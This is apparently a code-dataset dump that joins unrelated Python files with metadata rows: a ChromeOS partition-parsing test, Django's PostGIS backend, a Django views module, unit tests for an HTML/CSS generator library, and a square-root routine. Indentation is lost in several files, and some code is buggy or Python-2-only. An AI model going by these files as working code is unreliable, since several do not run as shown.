UUID: F4C5C3AD-027F-894B-80CD-3DEC57932948
53248 32768 4 Label: "KERN-B"
Type: ChromeOS kernel
UUID: C85FB478-404C-8741-ADB8-11312A35880D
Attr: priority=0 tries=0 successful=0
282624 819200 5 Label: "ROOT-B"
Type: ChromeOS rootfs
UUID: A99F4231-1EC3-C542-AC0C-DF3729F5DB07
16448 1 6 Label: "KERN-C"
Type: ChromeOS kernel
UUID: 81F0E336-FAC9-174D-A08C-864FE627B637
Attr: priority=0 tries=0 successful=0
16449 1 7 Label: "ROOT-C"
Type: ChromeOS rootfs
UUID: 9E127FCA-30C1-044E-A5F2-DF74E6932692
86016 32768 8 Label: "OEM"
Type: Linux data
UUID: 72986347-A37C-684F-9A19-4DBAF41C55A9
16450 1 9 Label: "reserved"
Type: ChromeOS reserved
UUID: BA85A0A7-1850-964D-8EF8-6707AC106C3A
16451 1 10 Label: "reserved"
Type: ChromeOS reserved
UUID: 16C9EC9B-50FA-DD46-98DC-F781360817B4
64 16384 11 Label: "RWFW"
Type: ChromeOS firmware
UUID: BE8AECB9-4F78-7C44-8F23-5A9273B7EC8F
249856 32768 12 Label: "EFI-SYSTEM"
Type: EFI System Partition
UUID: 88FB7EB8-2B3F-B943-B933-EEC571FFB6E1
4050847 32 Sec GPT table
4050879 1 Sec GPT header
"""
def testCgpt(self):
"""Tests that we can list all partitions with `cgpt` correctly."""
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_CGPT)
partitions = image_lib.GetImageDiskPartitionInfo('...')
part_dict = {p.name: p for p in partitions}
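    # cgpt reports start/size in 512-byte sectors; GetImageDiskPartitionInfo
    # is expected to convert them to bytes, e.g. STATE starts at
    # 1921024 * 512 = 983564288.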
self.assertEqual(part_dict['STATE'].start, 983564288)
self.assertEqual(part_dict['STATE'].size, 1073741824)
self.assertEqual(part_dict['STATE'].number, 1)
self.assertEqual(part_dict['STATE'].name, 'STATE')
self.assertEqual(part_dict['EFI-SYSTEM'].start, 249856 * 512)
self.assertEqual(part_dict['EFI-SYSTEM'].size, 32768 * 512)
self.assertEqual(part_dict['EFI-SYSTEM'].number, 12)
self.assertEqual(part_dict['EFI-SYSTEM'].name, 'EFI-SYSTEM')
self.assertEqual(12, len(partitions))
def testNormalPath(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=False)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_PARTED)
partitions = image_lib.GetImageDiskPartitionInfo('_ignored')
part_dict = {p.name: p for p in partitions}
self.assertEqual(12, len(partitions))
self.assertEqual(1, part_dict['STATE'].number)
self.assertEqual(2097152000, part_dict['ROOT-A'].size)
def testKeyedByNumber(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=False)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_PARTED)
partitions = image_lib.GetImageDiskPartitionInfo(
'_ignored'
)
part_dict = {p.number: p for p in partitions}
self.assertEqual(12, len(part_dict))
self.assertEqual('STATE', part_dict[1].name)
self.assertEqual(2097152000, part_dict[3].size)
self.assertEqual('reserved', part_dict[9].name)
self.assertEqual('reserved', part_dict[10].name)
def testChangeUnitInsideChroot(self):
self.PatchObject(cros_build_lib, 'IsInsideChroot', return_value=True)
self.rc.AddCmdResult(partial_mock.Ignore(), output=self.SAMPLE_CGPT)
partitions = image_lib.GetImageDiskPartitionInfo('_ignored')
part_dict = {p.name: p for p in partitions}
self.assertEqual(part_dict['STATE'].start, 983564288)
self.assertEqual(part_dict['STATE'].size, 1073741824)
| bsd-3-clause | -1,855,077,315,737,941,500 | 42.074576 | 80 | 0.638939 | false |
pygeek/django | django/contrib/gis/db/backends/postgis/creation.py | 1 | 3881 | from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db.backends.postgresql_psycopg2.creation import DatabaseCreation
class PostGISCreation(DatabaseCreation):
geom_index_type = 'GIST'
geom_index_opts = 'GIST_GEOMETRY_OPS'
def sql_indexes_for_field(self, model, f, style):
"Return any spatial index creation SQL for the field."
from django.contrib.gis.db.models.fields import GeometryField
output = super(PostGISCreation, self).sql_indexes_for_field(model, f, style)
if isinstance(f, GeometryField):
gqn = self.connection.ops.geo_quote_name
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
if f.geography:
                # Geography columns are created normally.
pass
else:
# Geometry columns are created by `AddGeometryColumn`
# stored procedure.
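                # For illustration, with a hypothetical table/column the
                # generated statement looks like:
                #   SELECT AddGeometryColumn('city', 'geom', 4326, 'POINT', 2);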
output.append(style.SQL_KEYWORD('SELECT ') +
style.SQL_TABLE('AddGeometryColumn') + '(' +
style.SQL_TABLE(gqn(db_table)) + ', ' +
style.SQL_FIELD(gqn(f.column)) + ', ' +
style.SQL_FIELD(str(f.srid)) + ', ' +
style.SQL_COLTYPE(gqn(f.geom_type)) + ', ' +
style.SQL_KEYWORD(str(f.dim)) + ');')
if not f.null:
# Add a NOT NULL constraint to the field
output.append(style.SQL_KEYWORD('ALTER TABLE ') +
style.SQL_TABLE(qn(db_table)) +
style.SQL_KEYWORD(' ALTER ') +
style.SQL_FIELD(qn(f.column)) +
style.SQL_KEYWORD(' SET NOT NULL') + ';')
if f.spatial_index:
# Spatial indexes created the same way for both Geometry and
# Geography columns.
# PostGIS 2.0 does not support GIST_GEOMETRY_OPS. So, on 1.5
# we use GIST_GEOMETRY_OPS, on 2.0 we use either "nd" ops
# which are fast on multidimensional cases, or just plain
# gist index for the 2d case.
if f.geography:
index_opts = ''
elif self.connection.ops.spatial_version >= (2, 0):
if f.dim > 2:
index_opts = ' ' + style.SQL_KEYWORD('gist_geometry_ops_nd')
else:
index_opts = ''
else:
index_opts = ' ' + style.SQL_KEYWORD(self.geom_index_opts)
output.append(style.SQL_KEYWORD('CREATE INDEX ') +
style.SQL_TABLE(qn('%s_%s_id' % (db_table, f.column))) +
style.SQL_KEYWORD(' ON ') +
style.SQL_TABLE(qn(db_table)) +
style.SQL_KEYWORD(' USING ') +
style.SQL_COLTYPE(self.geom_index_type) + ' ( ' +
style.SQL_FIELD(qn(f.column)) + index_opts + ' );')
return output
def sql_table_creation_suffix(self):
cursor = self.connection.cursor()
cursor.execute('SELECT datname FROM pg_database;')
db_names = [row[0] for row in cursor.fetchall()]
postgis_template = getattr(settings, 'POSTGIS_TEMPLATE', 'template_postgis')
if postgis_template in db_names:
qn = self.connection.ops.quote_name
return ' TEMPLATE %s' % qn(postgis_template)
elif self.connection.ops.spatial_version < (2, 0):
raise ImproperlyConfigured("Template database '%s' does not exist." % postgis_template)
else:
return ''
| bsd-3-clause | -6,418,817,060,973,817,000 | 48.126582 | 99 | 0.509147 | false |
sciencewiz1/datahub | src/datahub/browser/views.py | 1 | 1691 | import json, sys, re, hashlib, smtplib, base64, urllib, os
from auth import *
from core.account import manager
from django.http import *
from django.shortcuts import render_to_response
from django.views.decorators.csrf import csrf_exempt
from django.core.context_processors import csrf
from django.core.validators import email_re
from django.db.utils import IntegrityError
from django.utils.http import urlquote_plus
'''
@author: Anant Bhardwaj
@date: Mar 21, 2013
Datahub Web Handler
'''
@login_required
def user(request, username=None):
try:
if(username):
res = manager.list_databases(username)
return render_to_response("user.html", {'username': username, 'db_names':res['db_names']})
else:
user = request.session[kLogIn]
return HttpResponseRedirect(user)
except KeyError:
return HttpResponseRedirect('/login')
def new_database_form(request, username):
return render_to_response("new_database.html", {'username': username})
@login_required
def new_database(request, username, db_name):
manager.create_database(username, db_name)
return HttpResponseRedirect("/"+username)
@login_required
def database(request, username, db_name):
try:
res = manager.list_tables(db_name)
return render_to_response("database.html", {'username': username, 'db_name':db_name, 'table_names':res['table_names']})
except Exception, e:
return HttpResponse(request_error, mimetype="application/json")
@login_required
def table(request, username, db_name, table_name):
try:
return render_to_response("table.html", {'username': username, 'db_name':db_name, 'table_name':table_name})
except Exception, e:
return HttpResponse(request_error, mimetype="application/json")
| mit | -9,209,395,502,883,774,000 | 28.666667 | 121 | 0.752218 | false |
mikister/webgen | tests/test_dom.py | 1 | 25088 | """Unit tests for `dom.py`.
Todo:
* Add class methods to html tag tests
* Ul (from_list, from_dict, )
* Ol (from_list, from_dict, )
* Table (from_list, )
* Pass an instance of same class as parameter to ElementHTML class (test)
*
"""
import unittest
import os
# Allowing to import modules from parent directory
import sys
from pathlib import Path
sys.path.append(str(Path('.').absolute().parent))
import webgen.dom as dom
test_str = 'Python'
class TestInfrastructureElements(unittest.TestCase):
"""Tests infrastructure classes and functions from `dom.py`.
These classes include: List, Dict, ElementHTML, ElementCSS, ElementJS,
Functions are: compare_path,
"""
def test_List(self):
temp_list = dom.List(test_str, test_str)
self.assertEqual(temp_list.contents, [test_str, test_str],
                         msg='dom.List.__init__ failed.')
self.assertEqual(temp_list[0], test_str, msg='dom.List.__getitem__ failed.')
temp_list[0] = ''
self.assertEqual(temp_list[0], '', msg='dom.List.__setitem__ failed.')
self.assertEqual(len(temp_list), 2, msg='dom.List.__len__ failed.')
del (temp_list[0])
self.assertEqual(len(temp_list), 1, msg='dom.List.__delitem__ failed.')
temp_list('abc')
self.assertIn('abc', temp_list.contents, msg='dom.List.__call__ failed.')
def test_Dict(self):
temp_dict = dom.Dict(one=test_str, two=test_str)
self.assertEqual(temp_dict.contents, {'one': test_str, 'two': test_str},
msg='dom.Dict.__init__ failed.')
self.assertEqual(temp_dict['one'], test_str, msg='dom.Dict.__getitem__ failed.')
temp_dict['one'] = ''
self.assertEqual(temp_dict['one'], '', msg='dom.Dict.__setitem__ failed.')
self.assertEqual(len(temp_dict), 2, msg='dom.Dict.__len__ failed.')
del (temp_dict['one'])
self.assertEqual(len(temp_dict), 1, msg='dom.Dict.__delitem__ failed.')
temp_dict(abc=test_str)
self.assertIn('abc', temp_dict.contents.keys(), msg='dom.Dict.__call__ failed.')
def test_create_html_file(self):
pass
def test_create_css_file(self):
pass
def test_create_js_file(self):
pass
def test_compare_path(self):
testfoo = dom.compare_path
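        # compare_path(from_path, to_path) should return to_path expressed
        # relative to from_path's directory, e.g. starting from
        # '1\\2\\File1.html' the file 'File2.html' is reached via
        # '..\\..\\File2.html'.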
# When both File1.html and File2.html are in top-most local directory
path1, path2 = 'File1.html', 'File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When File1.html is in top-most local directory and File2.html is in a local subdirectory
path1, path2 = 'File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'1\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When File1.html is in a local subdirectory and File2.html is in top-most local directory
path1, path2 = '1\\2\\File1.html', 'File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# When both File1.html and File2.html are in a local subdirectory
path1, path2 = '1\\2\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', '1\\a\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\a\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\a\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', '1\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\2\\File1.html', 'a\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\a\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = 'a\\2\\File1.html', '1\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\1\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = '1\\File1.html', 'a\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\a\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
path1, path2 = 'a\\File1.html', '1\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\1\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# Testing different sub-directories with sub-sub-directories of a same name
path1, path2 = '1\\2\\File1.html', 'a\\2\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\..\\a\\2\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# path1 is outside local directory
path1, path2 = '..\\File1.html', 'File2.html'
correct_result = os.path.join(os.path.normpath(os.path.basename(os.getcwd())), 'File2.html')
self.assertEqual(testfoo(path1, path2),
correct_result,
msg=f'Finding relative path from {path1} to {path2} failed.')
# path2 is outside local directory
path1, path2 = 'File1.html', '..\\File2.html'
self.assertEqual(testfoo(path1, path2),
'..\\File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
# path1 and path2 are outside local directory
path1, path2 = '..\\File1.html', '..\\File2.html'
self.assertEqual(testfoo(path1, path2),
'File2.html',
msg=f'Finding relative path from {path1} to {path2} failed.')
def test_ElementHTML(self):
temp_html = dom.ElementHTML('tag', 'arg1', 'arg2', attr1='')
self.assertEqual(temp_html.contents, ['arg1', 'arg2'],
msg='dom.ElementHTML.__init__ does not properly implement dom.List.')
self.assertEqual(temp_html.tag, 'tag', msg='dom.ElementHTML.__init__ does not set `self.tag` property.')
self.assertIn('attr1', temp_html._attributes.keys(),
msg='dom.ElementHTML.__init__ does not set `self.attributes` property.')
temp_html.attributes(attr2='2')
self.assertIn('attr2', temp_html._attributes.keys(),
msg='dom.ElementHTML.attributes does not set `self.attributes` property.')
self.assertEqual(str(temp_html), '<tag attr2=\"2\">arg1arg2</tag>',
msg='dom.ElementHTML.__str__ failed.')
def test_ElementCSS(self):
temp_css = dom.ElementCSS('selector', declaration1='some_text')
test_text = 'selector {\n' \
'\tdeclaration1: some_text;\n' \
'}'
self.assertEqual(str(temp_css), test_text)
def test_ElementJS(self):
# temp_js = dom.ElementJS()
pass
class TestHTMLTags(unittest.TestCase):
"""Tests predefined and custom html tags from `dom.py`."""
def test_custom_tag(self):
custom_tag = dom.custom_tag('tag')
custom_tag_instance = custom_tag(' you\'re it!')
self.assertEqual(str(custom_tag_instance), '<tag> you\'re it!</tag>')
def test_html_tag(self):
temp_tag = dom.HTML('innerHTML')
self.assertEqual(str(temp_tag), '<html>innerHTML</html>')
def test_head_tag(self):
temp_tag = dom.Head('innerHTML')
self.assertEqual(str(temp_tag), '<head>innerHTML</head>')
def test_body_tag(self):
temp_tag = dom.Body('innerHTML')
self.assertEqual(str(temp_tag), '<body>innerHTML</body>')
def test_title_tag(self):
temp_tag = dom.Title('innerHTML')
self.assertEqual(str(temp_tag), '<title>innerHTML</title>')
def test_meta_tag(self):
temp_tag = dom.Meta('innerHTML')
self.assertEqual(str(temp_tag), '<meta>')
def test_link_tag(self):
temp_tag = dom.Link('innerHTML')
self.assertEqual(str(temp_tag), '<link>')
def test_link_dynamic_href(self):
Linked_File = dom.File('', 'stylesheet', 'css')
temp_tag = dom.Link(href=Linked_File)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<link href="stylesheet.css">\n')
def test_paragraph_tag(self):
temp_tag = dom.P('innerHTML')
self.assertEqual(str(temp_tag), '<p>innerHTML</p>')
def test_header_tag(self):
temp_tag = dom.H('innerHTML', size=2)
self.assertEqual(str(temp_tag), '<h2>innerHTML</h2>')
def test_anchor_tag(self):
temp_tag = dom.A('innerHTML')
self.assertEqual(str(temp_tag), '<a>innerHTML</a>')
def test_anchor_dynamic_href(self):
mock_html = dom.HTML()
File2 = dom.FileHTML('', 'File2', mock_html, doctype='<!doctype html>')
temp_tag = dom.A(href=File2)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<a href="File2.html"></a>\n')
def test_div_tag(self):
temp_tag = dom.Div('innerHTML')
self.assertEqual(str(temp_tag), '<div>innerHTML</div>')
def test_script_tag(self):
temp_tag = dom.Script('innerHTML')
self.assertEqual(str(temp_tag), '<script>innerHTML</script>')
def test_script_dynamic_src(self):
mock_js = dom.ElementJS()
JSFile = dom.FileJS('', 'javascript', mock_js)
temp_tag = dom.Script('innerHTML', src=JSFile)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<script src="javascript.js">innerHTML</script>\n')
def test_image_tag(self):
temp_tag = dom.Img('innerHTML')
self.assertEqual(str(temp_tag), '<img>')
def test_image_dynamic_src(self):
Image = dom.File('Folder1\\', 'Image', 'png')
temp_tag = dom.Img(src=Image)
File1 = dom.FileHTML('', 'File1', temp_tag, doctype='<!doctype html>')
self.assertEqual(str(File1),
'<!doctype html>\n' \
'<img src="Folder1\\Image.png">\n')
def test_ul_tag(self):
temp_tag = dom.Ul('innerHTML')
self.assertEqual(str(temp_tag), '<ul>innerHTML</ul>')
def test_ol_tag(self):
temp_tag = dom.Ol('innerHTML')
self.assertEqual(str(temp_tag), '<ol>innerHTML</ol>')
def test_li_tag(self):
temp_tag = dom.Li('innerHTML')
self.assertEqual(str(temp_tag), '<li>innerHTML</li>')
def test_table_tag(self):
temp_tag = dom.Table('innerHTML')
self.assertEqual(str(temp_tag), '<table>innerHTML</table>')
def test_tablerow_tag(self):
temp_tag = dom.Tr('innerHTML')
self.assertEqual(str(temp_tag), '<tr>innerHTML</tr>')
def test_tableheader_tag(self):
temp_tag = dom.Th('innerHTML')
self.assertEqual(str(temp_tag), '<th>innerHTML</th>')
def test_tablecell_tag(self):
temp_tag = dom.Td('innerHTML')
self.assertEqual(str(temp_tag), '<td>innerHTML</td>')
def test_hr_tag(self):
temp_tag = dom.Hr('innerHTML')
self.assertEqual(str(temp_tag), '<hr>')
def test_br_tag(self):
temp_tag = dom.Br('innerHTML')
self.assertEqual(str(temp_tag), '<br>')
def test_style_tag(self):
temp_tag = dom.Style('innerHTML')
self.assertEqual(str(temp_tag), '<style>innerHTML</style>')
def test_center_tag(self):
temp_tag = dom.Center('innerHTML')
self.assertEqual(str(temp_tag), '<center>innerHTML</center>')
class TestCSSElements(unittest.TestCase):
"""Tests predefined css elements from `dom.py`."""
def test_element_selector(self):
temp_ele = dom.SelectorElement('this_is_element')
test_text = 'this_is_element {\n' \
'}'
self.assertEqual(str(temp_ele), test_text)
def test_id_selector(self):
temp_id = dom.SelectorId('this_is_id')
test_text = '#this_is_id {\n' \
'}'
self.assertEqual(str(temp_id), test_text)
def test_class_selector(self):
temp_cls = dom.SelectorClass('this_is_class')
test_text = '.this_is_class {\n' \
'}'
self.assertEqual(str(temp_cls), test_text)
class TestCSSDeclarations(unittest.TestCase):
"""Tests predefined css declarations from `dom.py`."""
def test_predefined_css_declarations(self):
temp_css = dom.ElementCSS('')
temp_css.color('')
self.assertIn('color', temp_css.contents.keys(), msg='dom._CSSDeclarations.color failed.')
temp_css.direction('')
self.assertIn('direction', temp_css.contents.keys(), msg='dom._CSSDeclarations.direction failed.')
temp_css.letter_spacing('')
self.assertIn('letter-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.spacing_letter failed.')
temp_css.word_spacing('')
self.assertIn('word-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.spacing_word failed.')
temp_css.line_height('')
self.assertIn('line-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.line_height failed.')
temp_css.txt_align('')
self.assertIn('text-align', temp_css.contents.keys(), msg='dom._CSSDeclarations.align_txt failed.')
temp_css.vertical_align('')
self.assertIn('vertical-align', temp_css.contents.keys(), msg='dom._CSSDeclarations.align_vertical failed.')
temp_css.txt_deco('')
self.assertIn('text-decoration', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_deco failed.')
temp_css.txt_indent('')
self.assertIn('text-indent', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_indent failed.')
temp_css.txt_shadow('')
self.assertIn('text-shadow', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_shadow failed.')
temp_css.txt_transform('')
self.assertIn('text-transform', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_transform failed.')
temp_css.txt_overflow('')
self.assertIn('text-overflow', temp_css.contents.keys(), msg='dom._CSSDeclarations.txt_overflow failed.')
temp_css.unicode('')
self.assertIn('unicode-bidi', temp_css.contents.keys(), msg='dom._CSSDeclarations.unicode failed.')
temp_css.whitespace('')
self.assertIn('white-space', temp_css.contents.keys(), msg='dom._CSSDeclarations.white_space failed.')
temp_css.font('')
self.assertIn('font', temp_css.contents.keys(), msg='dom._CSSDeclarations.font failed.')
temp_css.font_family('')
self.assertIn('font-family', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_family failed.')
temp_css.font_size('')
self.assertIn('font-size', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_size failed.')
temp_css.font_style('')
self.assertIn('font-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_style failed.')
temp_css.font_variant('')
self.assertIn('font-variant', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_variant failed.')
temp_css.font_weight('')
self.assertIn('font-weight', temp_css.contents.keys(), msg='dom._CSSDeclarations.font_weight failed.')
temp_css.bg('')
self.assertIn('background', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg failed.')
temp_css.bg_color('')
self.assertIn('background-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_color failed.')
temp_css.bg_img('')
self.assertIn('background-image', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_img failed.')
temp_css.bg_repeat('')
self.assertIn('background-repeat', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_repeat failed.')
temp_css.bg_attachment('')
self.assertIn('background-attachment', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_attachment failed.')
temp_css.bg_pos('')
self.assertIn('background-position', temp_css.contents.keys(), msg='dom._CSSDeclarations.bg_pos failed.')
temp_css.border('')
self.assertIn('border', temp_css.contents.keys(), msg='dom._CSSDeclarations.border failed.')
temp_css.border_b('')
self.assertIn('border-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_b failed.')
temp_css.border_l('')
self.assertIn('border-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_l failed.')
temp_css.border_r('')
self.assertIn('border-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_r failed.')
temp_css.border_t('')
self.assertIn('border-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_t failed.')
temp_css.border_color('')
self.assertIn('border-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_color failed.')
temp_css.border_radius('')
self.assertIn('border-radius', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_radius failed.')
temp_css.border_style('')
self.assertIn('border-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_style failed.')
temp_css.border_width('')
self.assertIn('border-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_width failed.')
temp_css.border_collapse('')
self.assertIn('border-collapse', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_collapse failed.')
temp_css.border_spacing('')
self.assertIn('border-spacing', temp_css.contents.keys(), msg='dom._CSSDeclarations.border_spacing failed.')
temp_css.caption_side('')
self.assertIn('caption-side', temp_css.contents.keys(), msg='dom._CSSDeclarations.caption_side failed.')
temp_css.empty_cells('')
self.assertIn('empty-cells', temp_css.contents.keys(), msg='dom._CSSDeclarations.empty_cells failed.')
temp_css.table_layout('')
self.assertIn('table-layout', temp_css.contents.keys(), msg='dom._CSSDeclarations.table_layout failed.')
temp_css.margin('')
self.assertIn('margin', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin failed.')
temp_css.margin_b('')
self.assertIn('margin-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_b failed.')
temp_css.margin_l('')
self.assertIn('margin-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_l failed.')
temp_css.margin_t('')
self.assertIn('margin-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_t failed.')
temp_css.margin_r('')
self.assertIn('margin-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.margin_r failed.')
temp_css.padding('')
self.assertIn('padding', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding failed.')
temp_css.padding_b('')
self.assertIn('padding-bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_b failed.')
temp_css.padding_l('')
self.assertIn('padding-left', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_l failed.')
temp_css.padding_t('')
self.assertIn('padding-top', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_t failed.')
temp_css.padding_r('')
self.assertIn('padding-right', temp_css.contents.keys(), msg='dom._CSSDeclarations.padding_r failed.')
temp_css.height('')
self.assertIn('height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height failed.')
temp_css.max_height('')
self.assertIn('max-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height_max failed.')
temp_css.min_height('')
self.assertIn('min-height', temp_css.contents.keys(), msg='dom._CSSDeclarations.height_min failed.')
temp_css.width('')
self.assertIn('width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width failed.')
temp_css.max_width('')
self.assertIn('max-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width_max failed.')
temp_css.min_width('')
self.assertIn('min-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.width_min failed.')
temp_css.outline('')
self.assertIn('outline', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline failed.')
temp_css.outline_color('')
self.assertIn('outline-color', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_color failed.')
temp_css.outline_off('')
self.assertIn('outline-offset', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_off failed.')
temp_css.outline_style('')
self.assertIn('outline-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_style failed.')
temp_css.outline_width('')
self.assertIn('outline-width', temp_css.contents.keys(), msg='dom._CSSDeclarations.outline_width failed.')
temp_css.list_style('')
self.assertIn('list-style', temp_css.contents.keys(), msg='dom._CSSDeclarations.list failed.')
temp_css.list_style_img('')
self.assertIn('list-style-image', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_img failed.')
temp_css.list_style_pos('')
self.assertIn('list-style-position', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_pos failed.')
temp_css.list_style_type('')
self.assertIn('list-style-type', temp_css.contents.keys(), msg='dom._CSSDeclarations.list_type failed.')
temp_css.display('')
self.assertIn('display', temp_css.contents.keys(), msg='dom._CSSDeclarations.display failed.')
temp_css.visible('')
self.assertIn('visibility', temp_css.contents.keys(), msg='dom._CSSDeclarations.visible failed.')
temp_css.pos('')
self.assertIn('position', temp_css.contents.keys(), msg='dom._CSSDeclarations.pos failed.')
temp_css.bottom('')
self.assertIn('bottom', temp_css.contents.keys(), msg='dom._CSSDeclarations.bottom failed.')
temp_css.left('')
self.assertIn('left', temp_css.contents.keys(), msg='dom._CSSDeclarations.left failed.')
temp_css.top('')
self.assertIn('top', temp_css.contents.keys(), msg='dom._CSSDeclarations.top failed.')
temp_css.right('')
self.assertIn('right', temp_css.contents.keys(), msg='dom._CSSDeclarations.right failed.')
temp_css.clip('')
self.assertIn('clip', temp_css.contents.keys(), msg='dom._CSSDeclarations.clip failed.')
temp_css.z_ind('')
self.assertIn('z-index', temp_css.contents.keys(), msg='dom._CSSDeclarations.z_ind failed.')
temp_css.overflow('')
self.assertIn('overflow', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflow failed.')
temp_css.overflowX('')
self.assertIn('overflow-x', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflowX failed.')
temp_css.overflowY('')
self.assertIn('overflow-y', temp_css.contents.keys(), msg='dom._CSSDeclarations.overflowY failed.')
temp_css.clear('')
self.assertIn('clear', temp_css.contents.keys(), msg='dom._CSSDeclarations.clear failed.')
temp_css.float('')
self.assertIn('float', temp_css.contents.keys(), msg='dom._CSSDeclarations.float failed.')
if __name__ == '__main__':
unittest.main()
| mit | -2,836,461,636,050,776,000 | 40.813333 | 122 | 0.601044 | false |
downquark/algorithms | square_root.py | 1 | 1141 | from math import floor
def sqrt(S):
"""Given an integer, return the square root.
A continued fraction expansion implementation.
https://en.wikipedia.org/wiki/Methods_of_computing_square_roots#Continued_fraction_expansion
Args:
S: Any natural number
"""
i = 0
s = 1
if S == 0 or S == 1: return S
while s ** 2 < S:
if i ** 2 == S:
return i
s = s * 2
i += 1
return __search((s / 2), s, S)
def __search(i, k, S):
j = i + ((k - i) / 2)
s = j ** 2
if s == S:
return j
elif k == i + 1:
return __continued_fraction(S, [j], 1, 0)
elif s > S:
return __search(i, j, S)
elif s < S:
return __search(j, k, S)
def __continued_fraction(S, a, d_n, m_n):
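    # Standard recurrence for the continued fraction of sqrt(S):
    #   m_{n+1} = d_n * a_n - m_n
    #   d_{n+1} = (S - m_{n+1}**2) / d_n
    #   a_{n+1} = floor((a_0 + m_{n+1}) / d_{n+1})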
n = len(a) - 1
m_1 = (d_n * a[n]) - m_n
d_1 = (S - m_1 ** 2) / d_n
a_1 = int(floor((a[0] + m_1) / d_1))
a.append(a_1)
if a_1 != 2 * a[0] and len(a) < 11:
return __continued_fraction(S, a, d_1, m_1)
else:
result = 1.0
while len(a):
result = a.pop() + (1 / result)
return result | gpl-2.0 | 7,549,270,143,950,171,000 | 24.377778 | 100 | 0.468887 | false |
